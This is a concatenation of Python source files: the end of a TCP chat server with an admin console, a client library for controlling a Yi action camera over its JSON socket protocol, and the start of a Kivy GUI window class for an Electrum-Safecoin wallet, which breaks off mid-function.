        self.daemon = True

    def run(self):
        # Receive loop: relay every message to all other online clients.
        while not halt:
            try:
                message = self.connection.recv(2048)
            except OSError:
                return
            if (not message) or (message == bytes("%exit", "utf8")):
                self.closeConnection()
                return
            message = str(message, "utf8")
            self.broadcast(self.username + ": " + message)
        return

    def sendMessage(self, message):
        """Send a text message to this client."""
        self.connection.send(bytes(message, "utf8"))

    def changeUsername(self, newUsername):
        """Rename this client and announce the change."""
        self.broadcast(self.username + " changed his name to " + newUsername)
        self.username = newUsername

    def broadcast(self, message):
        # Relay `message` to every other online connection.
        for connection in connectionDictionary:
            if connectionDictionary[connection].isonline is True:
                if connectionDictionary[connection].id != self.id:
                    connectionDictionary[connection].sendMessage(message)

    def rejectConnection(self, exitmessage):
        """Refuse this connection: notify the client and close the socket."""
        try:
            self.connection.send(bytes(exitmessage, "utf8"))
            self.connection.send(bytes("%exit", "utf8"))
        except OSError:
            # Fix: previously a bare except that returned early, leaking the
            # socket; the client is already gone -- still close our side.
            pass
        self.connection.close()
        self.isonline = False
        # Fix: missing space before "rejected" in the log line.
        print("Connection from " + self.ip + ":" + str(self.port) + " rejected")
        return

    def closeConnection(self, exitmessage=False):
        """Close this connection, optionally sending a final message first."""
        if exitmessage:
            try:
                self.connection.send(bytes(exitmessage, "utf8"))
                self.connection.send(bytes("%exit", "utf8"))
            except OSError:
                # Fix: previously returned early, skipping the socket close and
                # the departure broadcast; proceed with cleanup instead.
                pass
        self.connection.close()
        self.isonline = False
        self.broadcast(self.username + " left")
        print(self.username + " on " + self.ip + ":" + str(self.port) + " with PID " + str(self.id) + " disconnected")
        return
def updateTime():
    # Background thread: refresh the global timestamp string once per second.
    # NOTE(review): currentTime is written here but never read in this module --
    # possibly intended for log prefixes; confirm before removing.
    global currentTime
    while not halt:
        currentTime = "[" + strftime("%Y-%m-%d %H:%M:%S", gmtime()) + "] "
        sleep(1)
    return
def cliInterpretor(string):
    """Split a command line into tokens.

    Whitespace separates tokens; a segment opened by ' or " becomes a single
    token until the next quote character (quote types are not matched against
    each other). Quote characters themselves are not included in tokens.
    """
    tokens = []
    buf = ''
    mode = 0  # 0 = between tokens, 1 = inside a bare word, 2 = inside quotes
    for ch in string:
        if mode == 2:
            if ch in "\"'":
                tokens.append(buf)
                buf = ''
                mode = 0
            else:
                buf += ch
        elif mode == 1:
            if ch == ' ':
                tokens.append(buf)
                buf = ''
                mode = 0
            else:
                buf += ch
        else:
            if ch in "\"'":
                mode = 2
            elif ch != ' ':
                mode = 1
                buf += ch
    # Flush a token left open at end of input.
    if buf != '':
        tokens.append(buf)
    return tokens
def ls(args):
    """Console command: list all connections, or show one connection's details."""
    if len(args) > 1:
        print("ls: Expect max. 2 arguments")
    elif len(args) == 1:
        name = args[0]
        if name in connectionDictionary:
            conn = connectionDictionary[name]
            print("Properties of \'" + name + "\':")
            print("ID: " + str(conn.id))
            print("IP: " + conn.ip)
            print("Port: " + str(conn.port))
            print("Username: " + conn.username)
            print("isonline: " + str(conn.isonline))
        else:
            print("ls: Connection \'" + name + "\' not found")
    else:
        if len(connectionDictionary) == 0:
            print("ls: There are no connections")
        for key in connectionDictionary:
            print(key + ": " + str(connectionDictionary[key]))
def getConnectedIPs():
    """Return the IP addresses of all currently-online connections.

    Used by connectedHost.__init__ to reject duplicate connections per IP.
    """
    # Fix: removed a leftover debug print of the IP list -- it ran on every
    # new connection attempt and spammed the server console.
    return [conn.ip for conn in connectionDictionary.values() if conn.isonline is True]
def setusername(args):
    """Console command: rename a connection's user ('setusername <conn> <name>')."""
    if len(args) == 0:
        print("setusername: Of which connection do you want to change the username")
        return
    if len(args) > 2:
        # Matches original behavior: silently ignore extra arguments.
        return
    name = args[0]
    if name not in connectionDictionary:
        print("setusername: Connection \'" + name + "\' doesn't exist")
        return
    if connectionDictionary[name].isonline is not True:
        print("setusername: \'" + name + "\' isn't online anymore")
        return
    if len(args) == 1:
        print("setusername: To which username do you want to change \'" + name + "\'")
    else:
        connectionDictionary[name].changeUsername(args[1])
def kick(args):
    """Console command: disconnect a client, optionally with a custom message."""
    if len(args) == 0:
        print("kick: Which connection do you want to kick?")
    elif len(args) > 2:
        print("kick: Expect max. 2 arguments")
    else:
        message = args[1] if len(args) == 2 else "You were kicked by the server"
        try:
            connectionDictionary[args[0]].closeConnection(message)
        except KeyError:
            print("kick: the connection \'" + args[0] + "\' doesn't exist")
def time(args):
    """Console command: print the current UTC time ('time' takes no arguments)."""
    if len(args) == 0:
        print(strftime("%Y-%m-%d %H:%M:%S", gmtime()))
    else:
        # Fix: the error message wrongly said "kick:" -- this is the time command.
        print("time: Expect max. 0 arguments")
def shutdown():
    """Console command `exit`: stop all threads, disconnect every client,
    close the listening socket and terminate the process."""
    global halt
    print("Closing connection listener...")
    halt = True # kill all threads
    print("Closing all connection threads...")
    for connection in connectionDictionary:
        if connectionDictionary[connection].isonline is True:
            connectionDictionary[connection].closeConnection("The server is shutting down you will be disconnected now")
    print("Closing socket...")
    server_socket.close()
    print("Exiting")
    exit(0)
def acceptConnections():
    """Accept loop: wraps each incoming socket in a connectedHost thread.

    Runs on its own daemon thread; ends when the listening socket is closed
    by shutdown() or when `halt` is set.
    """
    print("Started connection listener")
    connectionCounter = 0
    while not halt:
        try:
            connection, address = server_socket.accept()
        except ConnectionAbortedError:
            # Listening socket was closed by shutdown(); end the listener.
            return
        key = "conn" + str(connectionCounter)
        connectionDictionary[key] = connectedHost(connection, address, connectionCounter)
        try:
            connectionDictionary[key].start()
        except RuntimeError:
            # start() fails when __init__ bailed out before Thread.__init__
            # (duplicate IP rejection or an aborted handshake).
            # Fix: reworded the previously garbled error message.
            print("Connection not created because the initialization process failed")
        connectionCounter += 1
    return
def console():
    """Interactive server console: reads commands and dispatches them."""
    print("Welcome to the TCPChat2 server console")
    print("I'm ready for your commands!")
    # Command dispatch table; each handler receives the argument list.
    handlers = {
        "ls": lambda args: ls(args),
        "exit": lambda args: shutdown(),
        "kick": lambda args: kick(args),
        "clear": lambda args: os.system("clear"),
        "cls": lambda args: os.system("clear"),
        "time": lambda args: time(args),
        "setusername": lambda args: setusername(args),
    }
    while True:
        command = cliInterpretor(str(input("$ ")))
        if len(command) == 0:
            continue
        handler = handlers.get(command[0])
        if handler is not None:
            handler(command[1:])
        else:
            print("Command \'" + command[0] + "\' not found")
        print("")
# NOTE(review): these daemon threads start at import time, not under the
# __main__ guard -- importing this module side-effects a running server.
# creating thread for accepting connections
acceptConnectionsThread = threading.Thread(target=acceptConnections)
acceptConnectionsThread.daemon = True
acceptConnectionsThread.start()

# creating thread for time logging
timeUpdater = threading.Thread(target=updateTime)
timeUpdater.daemon = True
timeUpdater.start()

def main():
    # Runs the blocking console loop on the main thread.
    console()

if __name__ == "__main__":
    main()
|
api.py | import socket
import json
import time
import logging
import threading
def logger(name, loglevel="ERROR"):
    """Return a console logger named *name*, attaching a stream handler only once."""
    log = logging.getLogger(name)
    log.setLevel(loglevel)
    if not log.handlers:
        handler = logging.StreamHandler()
        handler.setLevel(loglevel)
        handler.setFormatter(logging.Formatter(
            "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
        ))
        log.addHandler(handler)
    return log
class yibase:
    """Base for camera feature helpers; holds the shared yisocket and a logger."""
    def __init__(self, connection_socket, loglevel="ERROR"):
        # connection_socket: a yisocket instance (shared by all helpers)
        self.socket = connection_socket
        self.log = logger(type(self).__name__, loglevel)
class yisocket:
    """TCP control-channel client speaking the Yi camera JSON protocol."""

    def __init__(self, ip="192.168.42.1", port=7878, loglevel="ERROR"):
        self.ip = ip
        self.port = port
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.token = None      # session token, obtained by connect()
        self.enabled = False
        self.log = logger("yisocket", loglevel)

    def send(self, id, param=None, param_type=None):
        # Send one JSON command; token 0 is used before authentication.
        data = {"msg_id": id}
        if self.token:
            data["token"] = self.token
        else:
            data["token"] = 0
        if param:
            data["param"] = param
        if param_type:
            data["type"] = param_type
        self.socket.send(str.encode(json.dumps(data)))
        # NOTE(review): fixed 1s pause after every send -- presumably gives the
        # camera time to reply before get_messages(); confirm necessity.
        time.sleep(1)

    def __process_message(self, message):
        # Decode one JSON reply; known negative rval error codes are logged
        # and re-raised as a generic Exception. Undecodable input yields {}.
        try:
            resp = json.loads(message)
            if "rval" in resp:
                if resp["rval"] == -3:
                    self.log.error("Different device connected.")
                    raise Exception
                elif resp["rval"] == -4:
                    self.log.error("Unauthorized: %i" % resp["msg_id"])
                    raise Exception
                elif resp["rval"] == -14:
                    self.log.error("Unable to set setting.")
                    raise Exception
                elif resp["rval"] == -27:
                    self.log.error("An error has occured. Check SD.")
                    raise Exception
        except json.decoder.JSONDecodeError:
            self.log.error("JSON decode failed: %s" % message)
            resp = {}
        return resp

    def get_messages(self, size=512):
        # Read one buffer and split concatenated JSON objects on "}{".
        raw = self.socket.recv(size).decode()
        if not "}{" in raw:
            return [self.__process_message(raw)]
        else:
            self.log.debug("Multiple messages found: %s" % raw)
            a = raw.split("}{")
            messages = []
            for j in a:
                # Re-add the braces stripped by split().
                if not j.startswith("{"):
                    j = "{" + j
                if not j.endswith("}"):
                    j += "}"
                msg = self.__process_message(j)
                messages.append(msg)
            return messages

    # Connect to camera and get the token
    def connect(self):
        self.socket.connect((self.ip, self.port))
        self.token = self.get_token()

    def close(self):
        self.socket.close()

    def get_token(self):
        # msg_id 257 requests a session token; replies may arrive interleaved
        # with other messages, so scan for the one carrying rval + param.
        self.log.debug("Get connection token")
        self.send(257)
        resp = self.get_messages()
        if resp:
            if isinstance(resp, list):
                for i in resp:
                    if "rval" in i and "param" in i:
                        resp = i
            if not "rval" in resp:
                # Token reply not in the first batch; read again.
                resp = self.get_messages()
        if "param" in resp:
            self.log.debug("Token found: %s" % resp["param"])
            return resp["param"]
class yistream(yibase):
    """Live RTSP stream control (msg_id 259)."""

    def __init__(self, connection_socket, loglevel="ERROR"):
        super().__init__(connection_socket, loglevel)
        self.enabled = False  # True while the keep-alive thread should run

    def __start_thread(self):
        # NOTE(review): sends msg_id 259 then just sleeps in a loop; presumably
        # the camera keeps streaming while this thread/connection is held --
        # confirm whether the loop is actually required.
        self.socket.send(259, param="none_force")
        self.log.debug("Stream enabled: rtsp://%s/live" % self.socket.ip)
        while self.enabled:
            time.sleep(1)

    def start(self):
        # Enable streaming and launch the keep-alive loop (non-daemon thread).
        self.enabled = True
        t = threading.Thread(target=self.__start_thread, args=[])
        t.start()

    def stop(self):
        # Clearing the flag lets the keep-alive loop exit within ~1 second.
        self.log.debug("Disabling stream")
        self.enabled = False
class yivideo(yibase):
    """Start/stop video recording to the camera's SD card."""

    def start(self):
        """Begin recording to the SD card (msg_id 513)."""
        self.log.debug("start recording video to SD")
        self.socket.send(513)

    def stop(self):
        """Stop recording (msg_id 514); return the saved file path if reported."""
        self.log.debug("stop recording video")
        self.socket.send(514)
        path = None
        for message in self.socket.get_messages():
            if "param" in message and "type" in message and message["type"] == "video_record_complete":
                path = message["param"]
                self.log.debug("recording saved: %s" % path)
        return path
class yiphoto(yibase):
    """Still-photo capture."""

    def capture(self):
        """Take a photo (msg_id 769); return the saved path if reported."""
        self.log.debug("saving photo")
        self.socket.send(769)
        for msg in self.socket.get_messages():
            if "type" in msg and "param" in msg and msg["type"] == "photo_taken":
                self.log.debug("Photo saved: %s" % msg["param"])
                return msg["param"]
class yisettings(yibase):
    """Read and modify camera settings."""

    def options(self, param):
        """Return the available options (and permission) for *param*, or None."""
        self.socket.send(9, param)
        found = None
        for msg in self.socket.get_messages():
            if "msg_id" in msg and "options" in msg and msg["msg_id"] == 9:
                found = {"options": msg["options"]}
                if "permission" in msg:
                    found["permission"] = msg["permission"]
        return found

    def set(self, setting, option):
        """Set *setting* to *option* (msg_id 2); drains the reply."""
        self.socket.send(2, option, setting)
        self.socket.get_messages()

    def get(self):
        """Fetch all settings (msg_id 3) merged into a single dict, or None."""
        self.socket.send(3)
        found = None
        for msg in self.socket.get_messages(4096):
            if "msg_id" in msg and "param" in msg and msg["msg_id"] == 3:
                found = msg["param"]
        if found:
            # The camera replies with a list of one-entry dicts; merge them.
            combined = dict()
            for entry in found:
                combined.update(entry)
            found = combined
        return found
class yi:
    """Facade tying together the socket, stream, video, photo and settings helpers."""

    def __init__(self, ip="192.168.42.1", port=7878, loglevel="DEBUG"):
        self.ip = ip
        self.port = port
        self.log = logger("yi", loglevel)
        # One control socket shared by every feature helper.
        self.socket = yisocket(ip, port, loglevel)
        self.stream = yistream(self.socket, loglevel)
        self.video = yivideo(self.socket, loglevel)
        self.photo = yiphoto(self.socket, loglevel)
        self.settings = yisettings(self.socket, loglevel)

    def get_settings(self):
        """Return the raw settings reply messages (msg_id 3)."""
        self.socket.send(3)
        opts = self.socket.get_messages(4096)
        return opts

    def get_battery_level(self):
        """Query the battery (msg_id 13); returns {'level': ..., 'type': ...}."""
        self.socket.send(13)
        resp = self.socket.get_messages()
        level = None
        # Fix: local renamed from `type`, which shadowed the builtin.
        batt_type = None
        for m in resp:
            if "type" in m and "param" in m:
                level = m["param"]
                batt_type = m["type"]
        return {"level": level, "type": batt_type}

    def connect(self):
        """Open the control socket and authenticate (fetches a token)."""
        self.socket.connect()

    def close(self):
        self.socket.close()
|
main_window.py | import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum_safecoin
from electrum_safecoin.bitcoin import TYPE_ADDRESS
from electrum_safecoin import WalletStorage, Wallet
from electrum_safecoin_gui.kivy.i18n import _
from electrum_safecoin.paymentrequest import InvoiceStore
from electrum_safecoin.util import profiler, InvalidPassword
from electrum_safecoin.plugins import run_hook
from electrum_safecoin.util import format_satoshis, format_satoshis_plain
from electrum_safecoin.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_safecoin_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_safecoin_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_safecoin_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_safecoin_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_safecoin_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_safecoin_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_safecoin.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
    # Kivy property observer: push the new auto_connect flag to the network,
    # keeping the other connection parameters unchanged.
    host, port, protocol, proxy, auto_connect = self.network.get_parameters()
    self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)

def toggle_auto_connect(self, x):
    self.auto_connect = not self.auto_connect

def choose_server_dialog(self, popup):
    # Let the user pick a server; fills the host/port fields of `popup`.
    from .uix.dialogs.choice_dialog import ChoiceDialog
    protocol = 's'
    def cb2(host):
        from electrum_safecoin import constants
        pp = servers.get(host, constants.net.DEFAULT_PORTS)
        port = pp.get(protocol, '')
        popup.ids.host.text = host
        popup.ids.port.text = port
    servers = self.network.get_servers()
    ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()

def choose_blockchain_dialog(self, dt):
    # Offer a chain choice when more than one blockchain branch exists.
    from .uix.dialogs.choice_dialog import ChoiceDialog
    chains = self.network.get_blockchains()
    def cb(name):
        # Follow the chain whose display name matches the user's pick.
        for index, b in self.network.blockchains.items():
            if name == self.network.get_blockchain_name(b):
                self.network.follow_chain(index)
        #self.block
    names = [self.network.blockchains[b].get_name() for b in chains]
    if len(names) >1:
        ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_change = BooleanProperty(False)

def on_use_change(self, instance, x):
    # Persist the "use change addresses" preference.
    self.electrum_config.set_key('use_change', self.use_change, True)

use_unconfirmed = BooleanProperty(False)

def on_use_unconfirmed(self, instance, x):
    # Stored inverted: the config key is 'confirmed_only'.
    self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)

def set_URI(self, uri):
    # Open the send screen pre-filled from a payment URI.
    self.switch_to('send')
    self.send_screen.set_URI(uri)

def on_new_intent(self, intent):
    # Android intent handler: only safecoin: URIs are accepted.
    if intent.getScheme() != 'safecoin':
        return
    uri = intent.getDataString()
    self.set_URI(uri)

def on_language(self, instance, language):
    # Switch the UI language at runtime.
    Logger.info('language: {}'.format(language))
    _.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
    """FX quotes callback (network thread): schedule a throttled history refresh."""
    Logger.info("on_quotes")
    self._trigger_update_history()
def on_history(self, d):
    """FX history callback (network thread): schedule a throttled history refresh."""
    Logger.info("on_history")
    self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'SAFE')
def _set_bu(self, value):
    """Persist a new base unit and refresh status/history displays.

    Raises ValueError for unknown units. The old code validated with
    ``assert``, which is silently stripped under ``python -O``; the
    redundant ``.keys()`` lookup is gone too.
    """
    if value not in base_units:
        raise ValueError('unknown base unit: %r' % (value,))
    self.electrum_config.set_key('base_unit', value, True)
    self._trigger_update_status()
    self._trigger_update_history()
# base_unit reads/writes the config through _get_bu/_set_bu.
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')     # status line shown in the UI
fiat_unit = StringProperty('')  # active fiat currency code ('' = fx disabled)
def on_fiat_unit(self, a, b):
    # Fiat column contents depend on the currency: redraw history.
    self._trigger_update_history()
def decimal_point(self):
    """Number of decimal places implied by the current base unit."""
    return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
    """Convert an amount string (in the current base unit) to a fiat string.

    Returns '' when the input is empty, FX is disabled, the rate is
    unavailable, or the amount cannot be parsed.
    """
    if not amount_str:
        return ''
    if not self.fx.is_enabled():
        return ''
    rate = self.fx.exchange_rate()
    if rate.is_nan():
        return ''
    amount_sat = self.get_amount(amount_str + ' ' + self.base_unit)
    if amount_sat is None:
        # get_amount() returns None for unparseable input; the old code
        # would have raised TypeError (None * rate) here.
        return ''
    fiat_amount = amount_sat * rate / pow(10, 8)
    return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
    """Convert a fiat amount string to a base-unit amount string.

    Returns '' when the input is empty or no usable exchange rate exists.
    """
    if not fiat_amount:
        return ''
    rate = self.fx.exchange_rate()
    if rate.is_nan() or rate == 0:
        # A zero rate would otherwise raise decimal.DivisionByZero below.
        return ''
    satoshis = int(pow(10, 8) * Decimal(fiat_amount) / Decimal(rate))
    return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
    """Parse '<number> <unit>' into an integer satoshi amount.

    Returns None when the numeric part is not a valid decimal. The unit
    must match the currently configured base unit.
    """
    a, u = amount_str.split()
    assert u == self.base_unit
    try:
        x = Decimal(a)
    except InvalidOperation:
        # was a bare ``except:`` — keep only the parse failure silent
        return None
    p = pow(10, self.decimal_point())
    return int(p * x)
_orientation = OptionProperty('landscape',
                              options=('landscape', 'portrait'))
def _get_orientation(self):
    return self._orientation
orientation = AliasProperty(_get_orientation,
                            None,
                            bind=('_orientation',))
'''Screen orientation, derived from the window size in :meth:`on_size`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
    return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
                        None,
                        bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
    """Build app state from kwargs (config, network, plugins, gui_object)
    before Kivy constructs the UI."""
    # initialize variables
    self._clipboard = Clipboard
    self.info_bubble = None
    self.nfcscanner = None
    self.tabs = None
    self.is_exit = False
    self.wallet = None
    self.pause_time = 0
    App.__init__(self)#, **kwargs)
    # NOTE(review): local 'title' is never used — probably meant self.title.
    title = _('Electrum-Safecoin App')
    self.electrum_config = config = kwargs.get('config', None)
    self.language = config.get('language', 'en')
    self.network = network = kwargs.get('network', None)
    if self.network:
        # Seed network-derived state; kept current by update_interfaces().
        self.num_blocks = self.network.get_local_height()
        self.num_nodes = len(self.network.get_interfaces())
        host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
        self.server_host = host
        self.server_port = port
        self.auto_connect = auto_connect
        self.proxy_config = proxy_config if proxy_config else {}
    self.plugins = kwargs.get('plugins', [])
    self.gui_object = kwargs.get('gui_object', None)
    self.daemon = self.gui_object.daemon
    self.fx = self.daemon.fx
    self.use_change = config.get('use_change', True)
    self.use_unconfirmed = not config.get('confirmed_only', False)
    # create triggers so as to minimize updating a max of 2 times a sec
    self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
    self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
    self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
    self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
    # cached dialogs
    self._settings_dialog = None
    self._password_dialog = None
    self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
    """Basename of the open wallet file, or a single space when none is open."""
    if not self.wallet:
        return ' '
    return os.path.basename(self.wallet.storage.path)
def on_pr(self, pr):
    """Handle an incoming BIP70-style payment request."""
    if pr.verify(self.wallet.contacts):
        key = self.wallet.invoices.add(pr)
        if self.invoices_screen:
            self.invoices_screen.update()
        status = self.wallet.invoices.get_status(key)
        if status == PR_PAID:
            self.show_error("invoice already paid")
            self.send_screen.do_clear()
        else:
            if pr.has_expired():
                self.show_error(_('Payment request has expired'))
            else:
                # Valid and unpaid: open the send tab preloaded with it.
                self.switch_to('send')
                self.send_screen.set_request(pr)
    else:
        self.show_error("invoice error:" + pr.error)
        self.send_screen.do_clear()
def on_qr(self, data):
    """Dispatch scanned QR contents: address, URI, or raw transaction."""
    from electrum_safecoin.bitcoin import base_decode, is_address
    data = data.strip()
    if is_address(data):
        self.set_URI(data)
        return
    if data.startswith('safecoin:'):
        self.set_URI(data)
        return
    # try to decode transaction
    from electrum_safecoin.transaction import Transaction
    from electrum_safecoin.util import bh2u
    try:
        text = bh2u(base_decode(data, None, base=43))
        tx = Transaction(text)
        tx.deserialize()
    except Exception:
        # was a bare ``except:``, which would also swallow KeyboardInterrupt
        tx = None
    if tx:
        self.tx_dialog(tx)
        return
    # show error
    self.show_error("Unable to decode QR data")
def update_tab(self, name):
    """Refresh the screen called ``<name>_screen`` if it has been created."""
    screen = getattr(self, '{}_screen'.format(name), None)
    if screen:
        screen.update()
@profiler
def update_tabs(self):
    """Refresh every main screen that has been instantiated."""
    for name in ('invoices', 'send', 'history', 'receive', 'address'):
        self.update_tab(name)
def switch_to(self, name):
    """Activate the tab called *name*, lazily loading its screen on first use."""
    s = getattr(self, name + '_screen', None)
    if s is None:
        # Screen not created yet: fetch the placeholder from the kv ids
        # and let it build its real content.
        s = self.tabs.ids[name + '_screen']
        s.load_screen()
    panel = self.tabs.ids.panel
    tab = self.tabs.ids[name + '_tab']
    panel.switch_to(tab)
def show_request(self, addr):
    """Switch to the receive tab preloaded with *addr*."""
    self.switch_to('receive')
    receive = self.receive_screen
    receive.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
    """Open the invoice popup populated from a request/invoice dict *req*."""
    from electrum_safecoin.util import format_time
    requestor = req.get('requestor')
    exp = req.get('exp')
    memo = req.get('memo')
    amount = req.get('amount')
    fund = req.get('fund')
    popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
    popup.is_invoice = is_invoice
    popup.amount = amount
    # Invoices show the requestor; own requests show the receiving address.
    popup.requestor = requestor if is_invoice else req.get('address')
    popup.exp = format_time(exp) if exp else ''
    popup.description = memo if memo else ''
    popup.signature = req.get('signature', '')
    popup.status = status
    popup.fund = fund if fund else 0
    txid = req.get('txid')
    popup.tx_hash = txid or ''
    popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
    popup.export = self.export_private_keys
    popup.open()
def show_addr_details(self, req, status):
    """Open the same invoice popup for a bare address request."""
    from electrum_safecoin.util import format_time
    fund = req.get('fund')
    isaddr = 'y'
    popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
    popup.isaddr = isaddr
    popup.is_invoice = False
    popup.status = status
    popup.requestor = req.get('address')
    popup.fund = fund if fund else 0
    popup.export = self.export_private_keys
    popup.open()
def qr_dialog(self, title, data, show_text=False):
    """Display *data* as a QR code (optionally with the text below it)."""
    from .uix.dialogs.qr_dialog import QRDialog
    popup = QRDialog(title, data, show_text)
    popup.open()
def scan_qr(self, on_complete):
    """Launch the Android QR scanner activity; *on_complete* gets the text.

    No-op on non-Android platforms.
    """
    if platform != 'android':
        return
    from jnius import autoclass, cast
    from android import activity
    PythonActivity = autoclass('org.kivy.android.PythonActivity')
    SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
    Intent = autoclass('android.content.Intent')
    intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
    def on_qr_result(requestCode, resultCode, intent):
        try:
            if resultCode == -1:  # RESULT_OK:
                # this doesn't work due to some bug in jnius:
                # contents = intent.getStringExtra("text")
                String = autoclass("java.lang.String")
                contents = intent.getStringExtra(String("text"))
                on_complete(contents)
        finally:
            # Always unbind so the handler doesn't fire for other activities.
            activity.unbind(on_activity_result=on_qr_result)
    activity.bind(on_activity_result=on_qr_result)
    PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
    """Open the Android share chooser with *data* as plain text."""
    if platform != 'android':
        return
    from jnius import autoclass, cast
    JS = autoclass('java.lang.String')
    Intent = autoclass('android.content.Intent')
    sendIntent = Intent()
    sendIntent.setAction(Intent.ACTION_SEND)
    sendIntent.setType("text/plain")
    sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
    PythonActivity = autoclass('org.kivy.android.PythonActivity')
    currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
    it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
    currentActivity.startActivity(it)
def build(self):
    # Kivy entry point: the root widget comes from the main kv file.
    return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
    if platform == 'android':
        # move activity to back
        from jnius import autoclass
        python_act = autoclass('org.kivy.android.PythonActivity')
        mActivity = python_act.mActivity
        mActivity.moveTaskToBack(True)
def on_start(self):
    '''This is the start point of the kivy ui
    '''
    import time
    # time.clock() was deprecated in Python 3.3 and removed in 3.8;
    # perf_counter() is the documented replacement for timing.
    Logger.info('Time to on_start: {} <<<<<<<<'.format(time.perf_counter()))
    win = Window
    win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
    win.bind(on_key_down=self.on_key_down)
    #win.softinput_mode = 'below_target'
    self.on_size(win, win.size)
    self.init_ui()
    # init plugins
    run_hook('init_kivy', self)
    # fiat currency
    self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
    # default tab
    self.switch_to('history')
    # bind intent for safecoin: URI scheme
    if platform == 'android':
        from android import activity
        from jnius import autoclass
        PythonActivity = autoclass('org.kivy.android.PythonActivity')
        mactivity = PythonActivity.mActivity
        self.on_new_intent(mactivity.getIntent())
        activity.bind(on_new_intent=self.on_new_intent)
    # connect callbacks
    if self.network:
        interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
        self.network.register_callback(self.on_network_event, interests)
        self.network.register_callback(self.on_fee, ['fee'])
        self.network.register_callback(self.on_quotes, ['on_quotes'])
        self.network.register_callback(self.on_history, ['on_history'])
    # load wallet
    self.load_wallet_by_name(self.electrum_config.get_wallet_path())
    # URI passed in config
    uri = self.electrum_config.get('url')
    if uri:
        self.set_URI(uri)
def get_wallet_path(self):
    """Path of the open wallet's storage file ('' when no wallet is open)."""
    wallet = self.wallet
    return wallet.storage.path if wallet else ''
def on_wizard_complete(self, instance, wallet):
    """Install-wizard callback: start and register the new wallet, if any."""
    if not wallet:
        return
    wallet.start_threads(self.daemon.network)
    self.daemon.add_wallet(wallet)
    self.load_wallet(wallet)
def load_wallet_by_name(self, path):
    """Open the wallet at *path*: prompt for the PIN when encrypted, or
    launch the install wizard when the file does not exist."""
    if not path:
        return
    if self.wallet and self.wallet.storage.path == path:
        return  # already open
    wallet = self.daemon.load_wallet(path, None)
    if wallet:
